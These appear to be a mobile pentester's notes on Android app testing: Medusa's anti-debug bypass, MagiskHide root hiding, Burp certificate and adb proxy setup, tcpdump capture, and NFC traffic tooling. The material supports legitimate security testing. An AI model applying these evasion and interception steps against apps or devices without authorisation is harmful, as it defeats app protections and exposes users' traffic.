git clone https://github.com/Ch0pin/medusa.git
cd medusa/
pip3 install -r requirements.txt
python3 medusa.py

# in medusa
search anti_debug
use helpers/anti_debug
compile
run -f $package_name

Magisk - MagiskHide

1. Download Magisk.apk : https://github.com/topjohnwu/Magisk/releases

2. Launch it in your device : Allow SuperUser access

3. Follow : https://www.xda-developers.com/how-to-install-magisk/

4. Enable MagiskHide : Magisk App > Settings > Magisk > Magisk Hide (enable)

5. Choose the application in which we will hide the root

Proxifier

How to easily proxy your Android deviceMedium

HTTP communications (Browser)

Configuring an Android device to work with Burp Suite ProfessionalBurp_Suite

1. Open Burp Suite > Proxy > Options > "Import / Export Certificate Authority ".

2. Select Certificate in DER format

3. Transfer the certificate to your device: adb push cert.der /data/local/tmp/cert-der.crt.

4. You can also drag and drop it if you are using an emulator.

Android System

• See : Disable SSL Pinning > Modify the network_security_config.xml file

• Android Proxy Toggle - GREAT

With ADB

adb shell settings put global http_proxy YOUR_IP:YOUR_PORT

Having Issues ?

Proxying Android app traffic – Common issues / checklist (2023)NVISO Labs

TCPDump

Packet analyzer, get the details of the visible traffic of the device.

adb root
adb remount
adb push /wherever/you/put/tcpdump /system/xbin
adb shell tcpdump -i any -p -s 0 -w /sdcard/capture.pcap
adb pull /sdcard/capture.pcap /wherever/you/want/to/save/it
wireshark /path/to/your/capture

NFC Traffic

GitHub - nfcgate/nfcgate: An NFC research toolkit application for AndroidGitHub

NFCGate is an Android application designed to capture, analyze or modify NFC traffic

Common problems

"Wi-Fi connected but no Internet"

Settings > Date & Time > Check 'Use Network-provided time'